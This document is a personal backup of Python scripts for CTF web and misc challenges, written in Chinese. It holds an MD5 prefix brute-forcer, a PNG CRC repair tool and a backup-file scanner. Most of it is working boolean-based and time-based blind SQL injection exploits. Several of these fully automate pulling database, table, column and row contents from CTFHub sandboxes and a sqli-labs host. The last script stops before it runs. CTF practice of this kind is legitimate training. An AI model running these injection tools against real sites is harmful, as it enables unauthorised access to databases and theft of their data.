py脚本备份

POST盲注(暴力)

from requests import *
import time
url = ''  # target URL, left empty in the backup; filled in before running
payload = {"id" : ""}  # the single POST form field that carries the condition
flag = ""
# Outer loop walks one character position per iteration.  The bound is only
# "large enough": there is no end-of-value detection, the script runs until
# it is interrupted.
for i in range(1,10000000000):#flag length
    time.sleep(0.06)
    for j in range(20, 126):#printable ASCII range
        # One request per candidate byte value (linear search), post() comes
        # from `from requests import *`.
        payload["id"] = "if((ascii(substr((select(flag)from(flag)),{0},1))={1}),1,0)".format(i, j)
        now = post(url, payload)
        time.sleep(0.04)
        if "Hello" in now.text:#replace "Hello" with whatever the page echoes for a true result
            print(i)
            flag += chr(j)
            print(flag)
            break 


POST盲注(二分)

from requests import *
import time
url = ""  # target URL, left empty in the backup; filled in before running
payload = {"id" : ""}  # the single POST form field that carries the condition
flag = ""
for i in range(1,200):#the upper bound hardly matters: the loop stops as soon as a space is read
    time.sleep(0.06)    
    l = 20; r = 126; mid = (l + r) // 2            
    while(l < r):
        # "greater than mid" test; a true response moves the lower bound up,
        # otherwise the upper bound comes down (binary search over 20..125).
        payload["id"] = "(ascii(substr((select(flag)from(flag)),{0},1))>{1})".format(i,mid)
        res = post(url,payload)
        time.sleep(0.04)
        # print(payload)
        if "Hello" in res.text:l = mid + 1#replace "Hello" with whatever the page echoes for a true result
        else:r = mid
        mid = (l + r) // 2
    # A space (the lowest value when nothing is there) is the end marker.
    if(chr(mid) == " "):break
    flag  += chr(mid)
    print(flag)
print("flag: " ,flag)

MD5碰撞

import requests
import base64
import sys
import hashlib
 
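def getMd5(index):
    """Return the first integer in [100000, 100000000) whose MD5 hex digest
    starts with *index*, or None when no such integer exists.

    This is the usual proof-of-work puzzle: the challenge shows the leading
    hex characters of md5(x) and asks for an x that produces them.

    Args:
        index: the expected hex prefix (case-insensitive; the original script
            assumed exactly 6 characters, any length is accepted now).

    Returns:
        The matching integer, or None if *index* is not a hex string or the
        search range is exhausted without a match.
    """
    prefix = str(index).strip().lower()
    # hexdigest() is lowercase hex, so a non-hex prefix can never match;
    # return early instead of walking ~10^8 candidates for nothing.
    if not prefix or any(c not in "0123456789abcdef" for c in prefix):
        return None
    width = len(prefix)
    for x in range(100000, 100000000):
        digest = hashlib.md5(str(x).encode("utf8")).hexdigest()
        if digest[:width] == prefix:
            return x
    return None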
# Read the wanted md5 prefix from stdin and print the first matching integer.
wanted_prefix = input()
print(getMd5(wanted_prefix))

CRC修复

import zlib
import struct
import argparse
import itertools


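parser = argparse.ArgumentParser()
parser.add_argument("-f", type=str, default=None, required=True,
                    help="输入同级目录下图片的名称")
args = parser.parse_args()


# PNG layout this script relies on: bytes 12..29 hold the IHDR chunk type and
# its 13 data bytes (width, height, bit depth, colour type, compression,
# filter, interlace), bytes 29..33 hold the CRC32 stored for that span.
with open(args.f, 'rb') as fh:
    bin_data = fh.read()

if len(bin_data) < 33:
    # Not even a complete PNG header; slicing below would silently produce
    # garbage instead of a meaningful comparison.
    print("文件太短, 不是完整的PNG头部!")
    raise SystemExit(1)

crc32key = zlib.crc32(bin_data[12:29])  # CRC computed over type + IHDR data
original_crc32 = int.from_bytes(bin_data[29:33], 'big')  # CRC stored in the file


if crc32key == original_crc32:  # computed CRC matches the stored one
    print('宽高没有问题!')
else:
    input_ = input("宽高被改了, 是否CRC爆破宽高? (Y/n):")
    if input_ not in ["Y", "y", ""]:
        raise SystemExit()
    # The unchanged parts of the chunk are hoisted out of the loop; only the
    # width and height fields (bytes 16..24) are re-generated.
    head = bin_data[12:16]
    tail = bin_data[24:29]
    # Width and height are searched up to 0x0FFF inclusive: the full 32-bit
    # range is impractical and realistic screen sizes fit in 12 bits.
    for i, j in itertools.product(range(4096), range(4096)):
        data = head + struct.pack('>II', i, j) + tail
        # When the CRC of the candidate chunk equals the stored CRC the
        # original dimensions have been found.
        if zlib.crc32(data) == original_crc32:
            print(f"\nCRC32: {hex(original_crc32)}")
            print(f"宽度: {i}, hex: {hex(i)}")
            print(f"高度: {j}, hex: {hex(j)}")
            raise SystemExit(0)
    print("在0..4095范围内没有找到匹配的宽高")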

Web敏感目录扫描

import requests
import time
print("网址:")

url = input()  # base URL typed by the user; a "/" is appended below

# Every name in li1 is combined with every extension in li2 and requested
# once; only the Response object (i.e. the status code) is printed.
li1 = ['web', 'website', 'backup', 'back', 'www', 'wwwroot', 'temp', 'index.php']
li2 = ['tar', 'tar.gz', 'zip', 'rar', 'swp']
for i in li1:
    for j in li2:
        url_final = url + "/" + i + "." + j
        r = requests.get(url_final)
        print(i+'.'+j)
        print(r)  # prints "<Response [status]>", not the body
        time.sleep(1)  # one request per second

-----------------------------------以下为网络搜集的脚本,非自己编写

自动化布尔盲注(GET)

import requests
from urllib.parse import quote

success_flag = "query_success" #substring present in the page only when the query returned a row
# Target from the original write-up: a CTFHub sandbox instance.  The injected
# expression is appended to the id query parameter after URL-encoding.
base_url = "http://challenge-af51e573b0753c56.sandbox.ctfhub.com:10800/?id="
# Browser-like request headers; "Connection: close" means one TCP connection
# per request, so every probe is a separate connection on the server side.
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}

def get_database_length():
    """Find the length of the current database name by testing 1, 2, 3, ...

    Each guess is sent as a boolean condition; the first length for which the
    page contains success_flag is printed and returned.
    """
    global success_flag, base_url, headers, cookies  # cookies is declared but never defined or used
    length = 1
    while (1):
        id = "1 and length(database()) = " + str(length)
        url = base_url + quote(id) #important: id contains characters such as '#' that must be URL-encoded
        response = requests.get(url, headers=headers).text
        if (success_flag not in response):
            print("database length", length, "failed!")
            length+=1
        else:
            print("database length", length, "success")
            print("payload:", id)
            break
    print("数据库名的长度为", length)
    return length

def get_database(database_length):
    """Recover the database name one character at a time.

    For every position a binary search over ASCII 0..127 is run: an "equal"
    test first, then a "greater than" test that halves the remaining range.
    The inner loop ends only on an "equal" match.

    Args:
        database_length: number of characters, from get_database_length().

    Returns:
        The recovered name as a str.
    """
    global success_flag, base_url, headers, cookies
    database = ""
    for i in range(1, database_length + 1):
        l, r = 0, 127 #tuple assignment sets both search bounds at once
        while (1):
            ascii = (l + r) // 2
            id_equal = "1 and ascii(substr(database(), " + str(i) + ", 1)) = " + str(ascii)
            response = requests.get(base_url + quote(id_equal), headers=headers).text
            if (success_flag in response):
                database += chr(ascii)
                print ("目前已知数据库名", database)
                break
            else:
                id_bigger = "1 and ascii(substr(database(), " + str(i) + ", 1)) > " + str(ascii)
                response = requests.get(base_url + quote(id_bigger), headers=headers).text
                if (success_flag in response):
                    l = ascii + 1
                else:
                    r = ascii - 1
    print("数据库名为", database)
    return database

def get_table_num(database):
    """Count the tables of *database* by testing 1, 2, 3, ... until the page
    contains success_flag; the matching count is printed and returned.

    Args:
        database: schema name, inserted into the query as a quoted literal.
    """
    global success_flag, base_url, headers, cookies
    num = 1
    while (1):
        id = "1 and (select count(table_name) from information_schema.tables where table_schema = '" + database + "') = " + str(num)
        response = requests.get(base_url + quote(id), headers=headers).text
        if (success_flag in response):
            print("payload:", id)
            print("数据库中有", num, "个表")
            break
        else:
            num += 1
    return num

def get_table_length(index, database):
    """Find the name length of the *index*-th (0-based, via LIMIT) table of
    *database* by testing 1, 2, 3, ... until success_flag appears.

    Returns:
        The length as an int.
    """
    global success_flag, base_url, headers, cookies
    length = 1
    while (1):
        id = "1 and (select length(table_name) from information_schema.tables where table_schema = '" + database + "' limit " + str(index) + ", 1) = " + str(length)
        response = requests.get(base_url + quote(id), headers=headers).text
        if (success_flag not in response):
            print("table length", length, "failed!")
            length+=1
        else:
            print("table length", length, "success")
            print("payload:", id)
            break
    print("数据表名的长度为", length)
    return length

def get_table(index, table_length, database):
    """Recover the name of the *index*-th table of *database*, one character
    at a time, with the same equal/greater-than binary search as
    get_database().

    Args:
        index: 0-based table offset used in LIMIT.
        table_length: name length, from get_table_length().
        database: schema name.

    Returns:
        The recovered table name.
    """
    global success_flag, base_url, headers, cookies
    table = ""
    for i in range(1, table_length + 1):
        l, r = 0, 127 #tuple assignment sets both search bounds at once
        while (1):
            ascii = (l + r) // 2
            id_equal = "1 and (select ascii(substr(table_name, " + str(i) + ", 1)) from information_schema.tables where table_schema = '" + database + "' limit " + str(index) + ",1) = " + str(ascii)
            response = requests.get(base_url + quote(id_equal), headers=headers).text
            if (success_flag in response):
                table += chr(ascii)
                print ("目前已知数据库名", table)  # message text is copied from get_database(); it prints the table name here
                break
            else:
                id_bigger = "1 and (select ascii(substr(table_name, " + str(i) + ", 1)) from information_schema.tables where table_schema = '" + database + "' limit " + str(index) + ",1) > " + str(ascii)
                response = requests.get(base_url + quote(id_bigger), headers=headers).text
                if (success_flag in response):
                    l = ascii + 1
                else:
                    r = ascii - 1
    print("数据表名为", table)
    return table

def get_column_num(table):
    """Count the columns of *table* (looked up by name only, without a schema
    filter) by testing 1, 2, 3, ... until success_flag appears.
    """
    global success_flag, base_url, headers, cookies
    num = 1
    while (1):
        id = "1 and (select count(column_name) from information_schema.columns where table_name = '" + table + "') = " + str(num)
        response = requests.get(base_url + quote(id), headers=headers).text
        if (success_flag in response):
            print("payload:", id)
            print("数据表", table, "中有", num, "个字段")
            break
        else:
            num += 1
    return num

def get_column_length(index, table):
    """Find the name length of the *index*-th column of *table* by testing
    1, 2, 3, ... until success_flag appears.

    Returns:
        The length as an int.
    """
    global success_flag, base_url, headers, cookies
    length = 1
    while (1):
        id = "1 and (select length(column_name) from information_schema.columns where table_name = '" + table + "' limit " + str(index) + ", 1) = " + str(length)
        response = requests.get(base_url + quote(id), headers=headers).text
        if (success_flag not in response):
            print("column length", length, "failed!")
            length+=1
        else:
            print("column length", length, "success")
            print("payload:", id)
            break
    print("数据表", table, "第", index, "个字段的长度为", length)
    return length

def get_column(index, column_length, table):
    """Recover the name of the *index*-th column of *table*, one character at
    a time, with the same equal/greater-than binary search as get_database().

    Args:
        index: 0-based column offset used in LIMIT.
        column_length: name length, from get_column_length().
        table: table name.

    Returns:
        The recovered column name.
    """
    global success_flag, base_url, headers, cookies
    column = ""
    for i in range(1, column_length + 1):
        l, r = 0, 127 #tuple assignment sets both search bounds at once
        while (1):
            ascii = (l + r) // 2
            id_equal = "1 and (select ascii(substr(column_name, " + str(i) + ", 1)) from information_schema.columns where table_name = '" + table + "' limit " + str(index) + ",1) = " + str(ascii)
            response = requests.get(base_url + quote(id_equal), headers=headers).text
            if (success_flag in response):
                column += chr(ascii)
                print ("目前已知字段为", column)
                break
            else:
                id_bigger = "1 and (select ascii(substr(column_name, " + str(i) + ", 1)) from information_schema.columns where table_name = '" + table + "' limit " + str(index) + ",1) > " + str(ascii)
                response = requests.get(base_url + quote(id_bigger), headers=headers).text
                if (success_flag in response):
                    l = ascii + 1
                else:
                    r = ascii - 1
    print("数据表", table, "第", index, "个字段名为", column)
    return column

def get_flag_num(column, table):
    """Count the rows of *table* (non-NULL values of *column*) by testing
    1, 2, 3, ... until success_flag appears.
    """
    global success_flag, base_url, headers, cookies
    num = 1
    while (1):
        id = "1 and (select count(" + column + ") from " + table + ") = " + str(num)
        response = requests.get(base_url + quote(id), headers=headers).text
        if (success_flag in response):
            print("payload:", id)
            print("数据表", table, "中有", num, "行数据")
            break
        else:
            num += 1
    return num

def get_flag_length(index, column, table):
    """Find the length of *column* in the *index*-th row of *table* by
    testing 1, 2, 3, ... until success_flag appears.

    Returns:
        The length as an int.
    """
    global success_flag, base_url, headers, cookies
    length = 1
    while (1):
        id = "1 and (select length(" + column + ") from " + table + " limit " + str(index) + ", 1) = " + str(length)
        response = requests.get(base_url + quote(id), headers=headers).text
        if (success_flag not in response):
            print("flag length", length, "failed!")
            length+=1
        else:
            print("flag length", length, "success")
            print("payload:", id)
            break
    print("数据表", table, "第", index, "行数据的长度为", length)
    return length

def get_flag(index, flag_length, column, table):
    """Recover the value of *column* in the *index*-th row of *table*, one
    character at a time, with the same equal/greater-than binary search as
    get_database().

    Args:
        index: 0-based row offset used in LIMIT.
        flag_length: value length, from get_flag_length().
        column: column name.
        table: table name.

    Returns:
        The recovered value.
    """
    global success_flag, base_url, headers, cookies
    flag = ""
    for i in range(1, flag_length + 1):
        l, r = 0, 127 #tuple assignment sets both search bounds at once
        while (1):
            ascii = (l + r) // 2
            id_equal = "1 and (select ascii(substr(" + column + ", " + str(i) + ", 1)) from " + table + " limit " + str(index) + ",1) = " + str(ascii)
            response = requests.get(base_url + quote(id_equal), headers=headers).text
            if (success_flag in response):
                flag += chr(ascii)
                print ("目前已知flag为", flag)
                break
            else:
                id_bigger = "1 and (select ascii(substr(" + column + ", " + str(i) + ", 1)) from " + table + " limit " + str(index) + ",1) > " + str(ascii)
                response = requests.get(base_url + quote(id_bigger), headers=headers).text
                if (success_flag in response):
                    l = ascii + 1
                else:
                    r = ascii - 1
    print("数据表", table, "第", index, "行数据为", flag)
    return flag

# Interactive driver: database name -> table names -> column names -> rows,
# with prompts to switch between tables and columns.  Every step is a
# separate round of requests through the helpers above.
if __name__ == "__main__":
    print("---------------------")
    print("开始获取数据库名长度")
    database_length = get_database_length()
    print("---------------------")
    print("开始获取数据库名")
    database = get_database(database_length)
    print("---------------------")
    print("开始获取数据表的个数")
    table_num = get_table_num(database)
    tables = []
    print("---------------------")
    for i in range(0, table_num):
        print("开始获取第", i + 1, "个数据表的名称的长度")
        table_length = get_table_length(i, database)
        print("---------------------")
        print("开始获取第", i + 1, "个数据表的名称")
        table = get_table(i, table_length, database)
        tables.append(table)
    while(1): #this loop lets the user look into any of the discovered tables
        print("---------------------")
        print("现在得到了以下数据表", tables)
        table = input("请在这些数据表中选择一个目标: ")
        while( table not in tables ):
            print("你输入有误")
            table = input("请重新选择一个目标")
        print("---------------------")
        print("选择成功,开始获取数据表", table, "的字段数量")
        column_num = get_column_num(table)
        columns = []
        print("---------------------")
        for i in range(0, column_num):
            print("开始获取数据表", table, "第", i + 1, "个字段名称的长度")
            column_length = get_column_length(i, table)
            print("---------------------")
            print("开始获取数据表", table, "第", i + 1, "个字段的名称")
            column = get_column(i, column_length, table)
            columns.append(column)
        while(1): #this loop fetches the records of any column of the selected table
            print("---------------------")
            print("现在得到了数据表", table, "中的以下字段", columns)
            column = input("请在这些字段中选择一个目标: ")
            while( column not in columns ):
                print("你输入有误")
                column = input("请重新选择一个目标")
            print("---------------------")
            print("选择成功,开始获取数据表", table, "的记录数量")
            flag_num = get_flag_num(column, table)
            flags = []
            print("---------------------")
            for i in range(0, flag_num):
                print("开始获取数据表", table, "的", column, "字段的第", i + 1, "行记录的长度")
                flag_length = get_flag_length(i, column, table)
                print("---------------------")
                print("开始获取数据表", table, "的", column, "字段的第", i + 1, "行记录的内容")
                flag = get_flag(i, flag_length, column, table)
                flags.append(flag)
            print("---------------------")
            print("现在得到了数据表", table, "中", column, "字段中的以下记录", flags)
            quit = input("继续切换字段吗?(y/n)")  # shadows the builtin quit(); harmless here
            if (quit == 'n' or quit == 'N'):
                break
            else:
                continue
        quit = input("继续切换数据表名吗?(y/n)")
        if (quit == 'n' or quit == 'N'):
            break
        else:
            continue
    print("bye~")

自动化时间盲注(GET)

import requests
from urllib.parse import quote

# Target from the original write-up: a CTFHub sandbox instance.  The injected
# expression is appended to the id query parameter after URL-encoding.
base_url = "http://challenge-af51e573b0753c56.sandbox.ctfhub.com:10800/?id="
# Browser-like request headers.  Note the Referer names a different sandbox
# instance than base_url, presumably left over from an earlier run.
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Referer": "http://challenge-59668c27594f7541.sandbox.ctfhub.com:10800/", "Upgrade-Insecure-Requests": "1"}

def get_database_length():
    """Find the length of the database name from response timing.

    The injected expression makes the server sleep(2) when the guess is
    wrong; with timeout=1 that surfaces as an exception, which is taken as
    "wrong" and the next length is tried.  Any exception, connection errors
    included, is read the same way as a timeout.
    """
    global base_url, headers
    length = 1
    while (1):
        id = "1 and if(length(database()) = " + str(length) + ", 1, sleep(2))"
        url = base_url + quote(id) #important: id contains characters such as '#' that must be URL-encoded
        try:
            requests.get(url, headers=headers, timeout=1).text
        except Exception:
            print("database length", length, "failed!")
            length+=1
        else:
            print("database length", length, "success")
            print("payload:", id)
            break
    print("数据库名的长度为", length)
    return length

def get_database(database_length):
    """Recover the database name one character at a time from response timing.

    Per position a binary search over ASCII 0..127 is run.  A request that
    returns within the timeout means the condition held; a timeout (or any
    other exception) means sleep(2) ran, i.e. the condition was false.

    Args:
        database_length: number of characters, from get_database_length().

    Returns:
        The recovered name as a str.
    """
    global base_url, headers
    database = ""
    for i in range(1, database_length + 1):
        l, r = 0, 127 #tuple assignment sets both search bounds at once
        while (1):
            ascii = (l + r) // 2
            id_equal = "1 and if(ascii(substr(database(), " + str(i) + ", 1)) = " + str(ascii) + ", 1, sleep(2))"
            try:
                requests.get(base_url + quote(id_equal), headers=headers, timeout=1).text
            except Exception:
                # Not equal: ask "greater than" to decide which half to keep.
                id_bigger = "1 and if(ascii(substr(database(), " + str(i) + ", 1)) > " + str(ascii) + ", 1, sleep(2))"
                try:
                    requests.get(base_url + quote(id_bigger), headers=headers, timeout=1).text
                except Exception:
                    r = ascii - 1
                else:
                    l = ascii + 1
            else:
                database += chr(ascii)
                print ("目前已知数据库名", database)
                break

    print("数据库名为", database)
    return database

def get_table_num(database):
    """Count the tables of *database* from response timing, testing
    1, 2, 3, ... until a request returns within the timeout.
    """
    global base_url, headers
    num = 1
    while (1):
        id = "1 and if((select count(table_name) from information_schema.tables where table_schema = '" + database + "') = " + str(num) + ", 1, sleep(2))"
        try:
            requests.get(base_url + quote(id), headers=headers, timeout=1).text
        except Exception:
            num += 1
        else:
            print("payload:", id)
            print("数据库中有", num, "个表")
            break
    return num

def get_table_length(index, database):
    """Find the name length of the *index*-th table of *database* from
    response timing, testing 1, 2, 3, ... until a request returns in time.

    Returns:
        The length as an int.
    """
    global base_url, headers
    length = 1
    while (1):
        id = "1 and if((select length(table_name) from information_schema.tables where table_schema = '" + database + "' limit " + str(index) + ", 1) = " + str(length) + ", 1, sleep(2))"
        try:
            requests.get(base_url + quote(id), headers=headers, timeout= 1).text
        except Exception:
            print("table length", length, "failed!")
            length+=1
        else:
            print("table length", length, "success")
            print("payload:", id)
            break
    print("数据表名的长度为", length)
    return length

def get_table(index, table_length, database):
    """Recover the name of the *index*-th table of *database* one character
    at a time, with the same timing-based binary search as get_database().

    Args:
        index: 0-based table offset used in LIMIT.
        table_length: name length, from get_table_length().
        database: schema name.

    Returns:
        The recovered table name.
    """
    global base_url, headers
    table = ""
    for i in range(1, table_length + 1):
        l, r = 0, 127 #tuple assignment sets both search bounds at once
        while (1):
            ascii = (l + r) // 2
            id_equal = "1 and if((select ascii(substr(table_name, " + str(i) + ", 1)) from information_schema.tables where table_schema = '" + database + "' limit " + str(index) + ",1) = " + str(ascii) + ", 1, sleep(2))"
            try:
                response = requests.get(base_url + quote(id_equal), headers=headers, timeout=1).text  # response is assigned but never read
            except Exception:
                id_bigger = "1 and if((select ascii(substr(table_name, " + str(i) + ", 1)) from information_schema.tables where table_schema = '" + database + "' limit " + str(index) + ",1) > " + str(ascii) + ", 1, sleep(2))"
                try:
                    response = requests.get(base_url + quote(id_bigger), headers=headers, timeout=1).text
                except Exception:
                    r = ascii - 1
                else:
                    l = ascii + 1
            else:
                table += chr(ascii)
                print ("目前已知数据库名", table)  # message text is copied from get_database(); it prints the table name here
                break
    print("数据表名为", table)
    return table

def get_column_num(table):
    """Count the columns of *table* (looked up by name only, without a schema
    filter) from response timing, testing 1, 2, 3, ... until a request
    returns within the timeout.
    """
    global base_url, headers
    num = 1
    while (1):
        id = "1 and if((select count(column_name) from information_schema.columns where table_name = '" + table + "') = " + str(num) + ", 1, sleep(2))"
        try:
            requests.get(base_url + quote(id), headers=headers, timeout=1).text
        except Exception:
            num += 1
        else:
            print("payload:", id)
            print("数据表", table, "中有", num, "个字段")
            break
    return num

def get_column_length(index, table):
    """Find the name length of the *index*-th column of *table* from
    response timing, testing 1, 2, 3, ... until a request returns in time.

    Returns:
        The length as an int.
    """
    global base_url, headers
    length = 1
    while (1):
        id = "1 and if((select length(column_name) from information_schema.columns where table_name = '" + table + "' limit " + str(index) + ", 1) = " + str(length) + ", 1, sleep(2))"
        try:
            requests.get(base_url + quote(id), headers=headers, timeout=1).text
        except Exception:
            print("column length", length, "failed!")
            length+=1
        else:
            print("column length", length, "success")
            print("payload:", id)
            break
    print("数据表", table, "第", index, "个字段的长度为", length)
    return length

def get_column(index, column_length, table):
    """Recover the name of the *index*-th column of *table* one character at
    a time, with the same timing-based binary search as get_database().

    Args:
        index: 0-based column offset used in LIMIT.
        column_length: name length, from get_column_length().
        table: table name.

    Returns:
        The recovered column name.
    """
    global base_url, headers
    column = ""
    for i in range(1, column_length + 1):
        l, r = 0, 127 #tuple assignment sets both search bounds at once
        while (1):
            ascii = (l + r) // 2
            id_equal = "1 and if((select ascii(substr(column_name, " + str(i) + ", 1)) from information_schema.columns where table_name = '" + table + "' limit " + str(index) + ",1) = " + str(ascii) + ", 1, sleep(2))"
            try:
                requests.get(base_url + quote(id_equal), headers=headers, timeout=1).text
            except Exception:
                id_bigger = "1 and if((select ascii(substr(column_name, " + str(i) + ", 1)) from information_schema.columns where table_name = '" + table + "' limit " + str(index) + ",1) > " + str(ascii) + ", 1, sleep(2))"
                try:
                    requests.get(base_url + quote(id_bigger), headers=headers, timeout=1).text
                except Exception:
                    r = ascii - 1
                else:
                    l = ascii + 1
            else:
                column += chr(ascii)
                print ("目前已知字段为", column)
                break

    print("数据表", table, "第", index, "个字段名为", column)
    return column

def get_flag_num(column, table):
    """Count the rows of *table* (non-NULL values of *column*) from response
    timing, testing 1, 2, 3, ... until a request returns within the timeout.
    """
    global base_url, headers
    num = 1
    while (1):
        id = "1 and if((select count(" + column + ") from " + table + ") = " + str(num) + ", 1, sleep(2))"
        try:
            requests.get(base_url + quote(id), headers=headers, timeout=1).text
        except Exception:
            num += 1
        else:
            print("payload:", id)
            print("数据表", table, "中有", num, "行数据")
            break
    return num

def get_flag_length(index, column, table):
    """Find the length of *column* in the *index*-th row of *table* from
    response timing, testing 1, 2, 3, ... until a request returns in time.

    Returns:
        The length as an int.
    """
    global base_url, headers
    length = 1
    while (1):
        id = "1 and if((select length(" + column + ") from " + table + " limit " + str(index) + ", 1) = " + str(length) + ", 1, sleep(2))"
        try:
            requests.get(base_url + quote(id), headers=headers, timeout=1).text
        except Exception:
            print("flag length", length, "failed!")
            length+=1
        else:
            print("flag length", length, "success")
            print("payload:", id)
            break
    print("数据表", table, "第", index, "行数据的长度为", length)
    return length

def get_flag(index, flag_length, column, table):
    """Recover the value of *column* in the *index*-th row of *table* one
    character at a time, with the same timing-based binary search as
    get_database().

    Args:
        index: 0-based row offset used in LIMIT.
        flag_length: value length, from get_flag_length().
        column: column name.
        table: table name.

    Returns:
        The recovered value.
    """
    global base_url, headers
    flag = ""
    for i in range(1, flag_length + 1):
        l, r = 0, 127 #tuple assignment sets both search bounds at once
        while (1):
            ascii = (l + r) // 2
            id_equal = "1 and if((select ascii(substr(" + column + ", " + str(i) + ", 1)) from " + table + " limit " + str(index) + ",1) = " + str(ascii) + ", 1, sleep(2))"
            try:
                requests.get(base_url + quote(id_equal), headers=headers, timeout=1).text
            except Exception:
                id_bigger = "1 and if((select ascii(substr(" + column + ", " + str(i) + ", 1)) from " + table + " limit " + str(index) + ",1) > " + str(ascii) + ", 1, sleep(2))"
                try:
                    requests.get(base_url + quote(id_bigger), headers=headers, timeout=1).text
                except Exception:
                    r = ascii - 1
                else:
                    l = ascii + 1
            else:
                flag += chr(ascii)
                print ("目前已知flag为", flag)
                break
    print("数据表", table, "第", index, "行数据为", flag)
    return flag

# Interactive driver, identical in structure to the boolean-based script:
# database name -> table names -> column names -> rows, with prompts to
# switch between tables and columns.
if __name__ == "__main__":
    print("---------------------")
    print("开始获取数据库名长度")
    database_length = get_database_length()
    print("---------------------")
    print("开始获取数据库名")
    database = get_database(database_length)
    print("---------------------")
    print("开始获取数据表的个数")
    table_num = get_table_num(database)
    tables = []
    print("---------------------")
    for i in range(0, table_num):
        print("开始获取第", i + 1, "个数据表的名称的长度")
        table_length = get_table_length(i, database)
        print("---------------------")
        print("开始获取第", i + 1, "个数据表的名称")
        table = get_table(i, table_length, database)
        tables.append(table)
    while(1): #this loop lets the user look into any of the discovered tables
        print("---------------------")
        print("现在得到了以下数据表", tables)
        table = input("请在这些数据表中选择一个目标: ")
        while( table not in tables ):
            print("你输入有误")
            table = input("请重新选择一个目标")
        print("---------------------")
        print("选择成功,开始获取数据表", table, "的字段数量")
        column_num = get_column_num(table)
        columns = []
        print("---------------------")
        for i in range(0, column_num):
            print("开始获取数据表", table, "第", i + 1, "个字段名称的长度")
            column_length = get_column_length(i, table)
            print("---------------------")
            print("开始获取数据表", table, "第", i + 1, "个字段的名称")
            column = get_column(i, column_length, table)
            columns.append(column)
        while(1): #this loop fetches the records of any column of the selected table
            print("---------------------")
            print("现在得到了数据表", table, "中的以下字段", columns)
            column = input("请在这些字段中选择一个目标: ")
            while( column not in columns ):
                print("你输入有误")
                column = input("请重新选择一个目标")
            print("---------------------")
            print("选择成功,开始获取数据表", table, "的记录数量")
            flag_num = get_flag_num(column, table)
            flags = []
            print("---------------------")
            for i in range(0, flag_num):
                print("开始获取数据表", table, "的", column, "字段的第", i + 1, "行记录的长度")
                flag_length = get_flag_length(i, column, table)
                print("---------------------")
                print("开始获取数据表", table, "的", column, "字段的第", i + 1, "行记录的内容")
                flag = get_flag(i, flag_length, column, table)
                flags.append(flag)
            print("---------------------")
            print("现在得到了数据表", table, "中", column, "字段中的以下记录", flags)
            quit = input("继续切换字段吗?(y/n)")  # shadows the builtin quit(); harmless here
            if (quit == 'n' or quit == 'N'):
                break
            else:
                continue
        quit = input("继续切换数据表名吗?(y/n)")
        if (quit == 'n' or quit == 'N'):
            break
        else:
            continue
    print("bye~")

布尔盲注(POST)

import requests
 
# Candidate characters tried, in this order, for every position of the value.
chars = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz_,-.@&%/^!~"
result = ""  # accumulated value; appended to by get_data()
 
def get_length(value):  #find the length of the value selected by data_payload
    """Test lengths 1..99 and return the first one whose response body is
    longer than *value* bytes; returns None implicitly if none matches.

    Reads the module-level url and data_payload, which are assigned further
    down in the script (after the function definitions).
    """
    for n in range(1,100):
        payload = "admin' and length(({0})) ={1} #".format(data_payload,n)
        data = {"uname":payload,"passwd":"admin"}
        html = requests.post(url,data=data)
        length = len(html.text)
        if length >value:
            print("……data length is :" + str(n))
            return  n
 
def get_data(data_length,value): #recover the value character by character
    """Append to the global result one character per position 1..data_length-1.

    Each character of chars is tried in turn (linear search); the first one
    whose response body is longer than *value* bytes is taken and the loop
    moves to the next position.
    """
    global result
    for i in range(1,data_length):
        for char in chars:
            payload = "admin'and ascii(substr(({0}),{1},1))={2} #".format(data_payload,i,ord(char))
            data = {"uname":payload,"passwd":"admin"}
            html = requests.post(url,data=data)
            length = len(html.text)
            if length>value:         #a longer page means the comparison was true
                result += char
                print("…… data is :"+ result)
                break
 
 
url = "http://43.247.91.228:84/Less-15/"  # target from the original post
data_payload = "select group_concat(table_name)from information_schema.tables where table_schema = database()"
value = 1460     # threshold between the "true" and "false" page sizes; read it off the browser's F12 network tab
 
length = get_length(value) +1  # +1 because get_data() iterates range(1, length), an exclusive upper bound
get_data(length,value)
print(result)

时间盲注(POST)

import requests
import time
# Candidate characters tried, in this order, for every position of the value.
value ="0123456789abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ%&^@_.-!"
result=""  # accumulated value; appended to by get_data()
 
def get_length():#find the length of the value selected by data_payload
    """Test lengths 1..99 and return the first one whose request took more
    than 3 seconds (the server slept); returns None implicitly otherwise.

    Reads the module-level url and data_payload, which are assigned further
    down in the script.
    """
    for n in range(1, 100):
        payload = "admin' and if((length(({0} ))={1}),sleep(4),1) #".format(data_payload, n)
        data = {"uname": payload, "passwd": "admin", "submit": "submit"}
        start_time = time.time()
        html = requests.post(url, data=data)
        end_time = time.time()
        use_time = end_time - start_time #the round-trip time decides whether the server delayed
        if use_time > 3:
            print("...... data's length is :"+ str(n))
            return n
 
def get_data(length):#recover the value character by character
    """Append to the global result for positions 1..length-1.

    Every character of value is tried for each position; a request that
    takes more than 4 seconds is read as a match.  There is no break after
    a match, so the remaining candidates are still sent for that position.
    """
    global result
    for n in range(1,length):
        for v in value:
            payload = "admin' and if((ascii(substr(({0} ),{1},1)) = '{2}'),sleep(5),1) #".format(data_payload,n,ord(v))
            data = {"uname":payload,"passwd":"admin","submit":"submit"}
            start_time = time.time()
            requests.post(url,data=data)
            end_time = time.time()
            use_time = end_time - start_time
            # The sleep is set well above the threshold because network jitter
            # here sometimes pushed a normal request past 2 seconds; the wider
            # margin keeps the recovered characters from being garbled.
            if use_time >4:
                result += v
                print("......"+result)
 
 
 
url = "http://43.247.91.228:84/Less-15/"  # target from the original post
 
data_payload ="select group_concat(table_name,0x7e)from information_schema.tables where table_schema=database()"
 
